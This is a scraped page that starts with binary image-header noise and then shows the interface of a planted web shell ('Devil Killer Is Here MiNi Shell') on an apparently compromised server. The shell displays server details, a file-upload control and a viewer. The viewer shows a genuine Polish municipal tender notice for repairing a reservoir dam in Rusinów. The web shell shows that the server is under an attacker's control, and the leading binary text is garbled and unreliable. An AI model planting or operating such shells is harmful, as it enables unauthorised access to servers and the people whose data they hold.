JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20221021/0040343701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont zbiornika wodnego w Nieznamierowicach i zagospodarowanie terenu wokół zbiornika </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rusinów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223965</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rusinów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-411</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 6727022</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">48 6727022 wew. 26</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rusinow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.rusinow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont zbiornika wodnego w Nieznamierowicach i zagospodarowanie terenu wokół zbiornika </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-01f5480a-510d-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00403437</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021637/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Remont zbiornika wodnego w Nieznamierowicach i zagospodarowanie terenu wokół zbiornika</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://bip.rusinow.pl/m,107,zamowienia-publiczne-i-przetargi.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcą odbywa się przy użyciu<br/>miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl; ePUAPu dostępnego pod adresem<br/>https://epuap.gov.pl/wps/portal, adres skrzynki Zamawiającego: /ya2vwq395g/SkrytkaESP (maksymalny rozmiar plików przesyłany<br/>za pośrednictwem ePUAP wynosi 150 MB) oraz skrzynki e-mail: hanna.kobylka@rusinow.pl (pojemność jednej wiadomości na<br/>skrzynce – 20 MB).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Postępowanie o udzielenie zamówienia prowadzi się w języku polskim, w formie elektronicznej lub postaci elektronicznej na stronie internetowej Zamawiającego http://bip.rusinow.pl/m,107,zamowienia-publiczne-i-przetargi.html oraz za pośrednictwem platformy https://miniportal.uzp.gov.pl;<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl; ePUAPu dostępnego pod adresem https://epuap.gov.pl/wps/portal, adres skrzynki Zamawiającego:/ya2vwq395g/SkrytkaESP (maksymalny rozmiar plików przesyłany za pośrednictwem ePUAP wynosi 150 MB) oraz skrzynki e-mail: hanna.kobylka@rusinow.pl (pojemność jednej wiadomości na skrzynce – 20 MB).<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na ePUAP.<br/>4. Za datę przekazania dokumentów i oświadczeń przyjmuje się datę ich przekazania na ePUAP lub skrzynkę e-mail.<br/>5. Formy i zasady składania dokumentów i oświadczeń:<br/>5.1. Dokumenty i oświadczenia Wykonawca składa w oryginale lub kopii poświadczonej za zgodność z oryginałem w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Jeżeli oryginał dokumentu lub oświadczenia nie zostały sporządzone w postaci dokumentu elektronicznego, Wykonawca może sporządzić i przekazać elektroniczną kopię posiadanego dokumentu lub oświadczenia. W przypadku przekazywania przez Wykonawcę elektronicznej kopii dokumentu lub oświadczenia, opatrzenie jej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez Wykonawcę jest równoznaczne z poświadczeniem elektronicznej kopii dokumentu lub oświadczenia za zgodność z oryginałem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest: Gmina Rusinów reprezentowana przez Wójta Gminy Rusinów, z siedzibą w Rusinowie, ul. Żeromskiego 4, 26-411 Rusinów, tel. 48 67 27 022, e-mail: gmina@rusinow.pl; <br/>	inspektorem ochrony danych osobowych w Urzędzie Gminy Rusinów jest Pani Elżbieta Walasik, e-mail: e.walasik@rusinow.pl; <br/>Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego <br/>	odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”; <br/>	Państwa dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiadają Państwo:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych ;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych dotyczących Państwa narusza przepisy RODO;<br/>	nie przysługuje Państwu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót do realizacji: <br/>1) zagospodarowanie terenu:<br/>- remont istniejącego zjazdu na działkę,<br/>- wykonanie utwardzenia terenu obejmującego wjazd na działkę, wewnętrzny ciąg pieszo-jezdny, plac gospodarczy i alejki spacerowe,<br/>- urządzenie placu zabaw dla dzieci,<br/>- urządzenie brzegu piaskowego,<br/>- urządzenie miejsca na ognisko,<br/>- montaż 2 altan ogrodowych,<br/>- montaż obiektów małej architektury: ławek parkowych, koszy na śmieci i stojaków rowerowych,<br/>- montaż urządzeń uzupełniających: składanych słupków parkingowych, parkowych lamp solarnych oraz zestawu do monitoringu terenu.<br/>2) Opis projektowanych robót remontowych budowli piętrzącej – tamy faszynowo - kamiennej.<br/>Wykonanie remontu istniejącej tamy faszynowo – kamiennej, polegającego na wykonywaniu w istniejącym obiekcie budowlanym robót budowlanych polegających na odtworzeniu stanu pierwotnego a niestanowiących bieżącej konserwacji, przy częściowym zastosowaniu wyrobów budowlanych innych niż użyto w stanie pierwotnym. Do wykonania remontu tamy wykorzystane będą: od strony wody dolnej gabiony oraz materace siatkowo-kamienne; od strony wody górnej narzut kamienny w płotkach na podkładzie z geowłókniny, oraz kosz siatkowo-kamienny.<br/>W ramach robót remontowych ze względu na istniejące ubytki drewna na istniejącej ściance szczelnej i utracie jej szczelności, przedmiotowa ścianka szczelna zostanie doszczelniona grodzicami stalowymi GZ-4 o długości 3,20 m, długość ścianki szczelnej L = 25 mb, co zapewni szczelność tamy faszynowo-kamiennej.<br/>W ramach naprawy ubezpieczeń dolnego stanowiska tamy(poszuru) projektuje się wykonanie:<br/>	zasypanie wyrw w skarpach rzeki gruntem piaszczystym z zagęszczeniem warstwami co 20 cm;<br/>	wyrównanie i uformowanie dna i skarp z wykorzystaniem istniejącego, przemieszczonego narzutu kamiennego jako podłoże do wykonania materaca siatkowo-kamiennego;<br/>	ułożenie na uformowane dno i skarpy geowłókniny igłowanej lub geotkaniny 400 kN/m2;<br/>- wykonanie na dnie i skarpach materaca siatkowo-kamiennego z siatki stalowej o sześciokątnych oczkach i podwójnym splocie drutów z przegrodami poprzecznymi co 2 x 0,5 m, wymiary oczek 6 x 8 cm, grubość drutu 2,2/3,2 mm, powłoki antykorozyjne ze stopu cynkowo-aluminiowego, wypełnienie koszy twardymi niezwietrzałymi i odpornymi na działanie wody i mrozu kamieniami(otoczaki, kamień łamany) nie mniejsze od wymiaru oczka siatki, największe kamienie o wymiarze nie przekraczającym 2,5 krotnego wymiaru oczka siatki; <br/>- wykonanie na dnie i skarpach gurtu końcowego w formie ułożonych koszy siatkowo-kamiennych(gabionów) o wymiarach 1,0 x 1,0 x 2,0 m, wymiary oczek 6 x 8 cm, grubość drutu 2,2/3,2 mm, powłoki antykorozyjne ze stopu cynkowo-aluminiowego wypełnienie koszy twardymi niezwietrzałymi i odpornymi na działanie wody i mrozu kamieniami(otoczaki, kamień łamany) nie mniejsze od wymiaru oczka siatki, największe kamienie o wymiarze nie przekraczającym 2,5 krotnego wymiaru oczka siatki;<br/>	na zakończeniu ubezpieczenia poszuru zostanie wykonana palisada z pali Ø 5 – 6 cm, głębokość wbicia 1,20 m; <br/>W ramach naprawy ubezpieczeń górnego stanowiska tamy(ponuru) projektuje się wykonanie:<br/>	wyrównanie i uformowanie dna i skarp z wykorzystaniem istniejącego, przemieszczonego narzutu kamiennego jako podłoże do wykonania narzutu kamiennego w płotkach;<br/>	ubezpieczenie dna i skarp narzutem kamiennym w płotkach z kiszki faszynowej, grubość narzutu kamiennego 0,30 m, kamień Ø 15 – 30 cm układany na geowłókninie igłowanej lub geotkaninie 400 kN/m2;<br/>	wykonanie na dnie i skarpach gurtu w formie ułożonych koszy siatkowo-kamiennych(gabionów) o wymiarach 0,5 x 1,0 x 2,0 m, wymiary oczek 6 x 8 cm, grubość drutu 2,2/3,2 mm, powłoki antykorozyjne ze stopu cynkowo-aluminiowego wypełnienie koszy twardymi niezwietrzałymi i odpornymi na działanie wody i mrozu kamieniami(otoczaki, kamień łamany) nie mniejsze od wymiaru oczka siatki, największe kamienie o wymiarze nie przekraczającym 2,5 krotnego wymiaru oczka siatki.<br/>3) Opis projektowanych robót do wykonania w czaszy zbiornika wodnego.<br/>	Karczowanie porostów i samosiejek porastających czaszę zbiornika, odmulenie dna zbiornika wodnego, plantowanie dna i skarp zbiornika wodnego oraz obsiew mieszanką traw skarp i terenu przyległego do zbiornika. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45243600-8 - Roboty budowlane w zakresie ścianek szczelnych</p> <p class="mb-0">45240000-1 - Budowa obiektów inżynierii wodnej</p> <p class="mb-0">45111291-4 - Roboty w zakresie zagospodarowania terenu</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielonej gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają warunki, o których mowa w art. 112 ustawy Pzp i którzy wykażą ich spełnienie na poziomie wymaganym przez Zamawiającego zgodnie z poniższym opisem.<br/>2. Warunki w zakresie zdolności do występowania w obrocie gospodarczym. Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie i nie będzie dokonywał oceny jego spełnienia.<br/>3. Warunki w zakresie posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie i nie będzie dokonywał oceny jego spełnienia.<br/>4. Warunki dotyczące sytuacji ekonomicznej i finansowej.<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie i nie będzie dokonywał oceny jego spełnienia.<br/>5. Warunki dotyczące zdolności technicznej i zawodowej.<br/>a) Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum trzy roboty budowlane polegające na zagospodarowaniu przestrzeni publicznej (z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane) i udokumentuje, że roboty te zostały wykonane w sposób należyty.<br/>b) Dysponuje osobami zdolnymi do realizacji zamówienia.<br/>Zamawiający uzna spełnienie tego warunku w oparciu o wykaz osób, które będą uczestniczyć w wykonaniu zamówienia pełniąc funkcję kierownika budowy i które posiadają uprawnienia do kierowania robotami budowlanymi w branży konstrukcyjno-budowlanej (kierowanie min. dwiema robotami budowlanymi – zagospodarowanie przestrzeni publicznej). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień ich złożenia tj.:<br/>1) Wykaz wykonywanych robót budowlanych polegających na zagospodarowaniu przestrzeni publicznej nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał minimum trzy roboty budowlane. Wykaz należy sporządzić zgodnie ze wzorem – załącznik nr 6 do SWZ. Do wykazu należy dołączyć dokumenty potwierdzające, że wykazane w załączonym wykazie roboty budowlane zostały wykonane należycie. Dokumentami tymi są: referencje lub inne dokumenty. Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia wystawionego przez odbiorców na rzecz których realizował roboty składa oświadczenie.<br/>2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia pełniąc funkcję kierownika budowy/robót w specjalności – branża konstrukcyjno-budowlana (kierowanie min. dwiema robotami budowlanymi – zagospodarowanie przestrzeni publicznej). Do sporządzenia wykazu należy wykorzystać załącznik nr 7 do SWZ.<br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia Wykonawca składa pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzone odpowiednim podpisem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o braku podstaw do wykluczenia z postępowania oraz o spełnieniu warunków udziału w postępowaniu odpowiednio na dzień składania ofert należy złożyć w postaci dokumentu elektronicznego pod rygorem nieważności, podpisanego podpisem elektronicznym weryfikowalnym za pomocą ważnego kwalifikowalnego certyfikatu lub równoważnego środka, spełniającego wymagania dla tego rodzaju podpisu (załącznik nr 3).<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie, o którym mowa wyżej składa każdy Wykonawca.<br/>3. Zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, w przypadku polegania Wykonawcy na zdolnościach lub sytuacji innych podmiotów w celu potwierdzenia spełnienia warunków udziału w postępowaniu (należy złożyć w postaci elektronicznej i opatrzyć elektronicznym kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym – załącznik nr 4).<br/>4. Pełnomocnictwo – upoważnienie osób podpisujących ofertę, jeżeli upoważnienie takie nie wynika wprost z odpisu z właściwego rejestru Wykonawcy, to do oferty należy dołączyć dokument ustanawiający Pełnomocnika.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców ubiegających się o zamówienie, ewentualnie umowę o współdziałaniu, z której będzie wynikać takie pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w<br/>postępowaniu 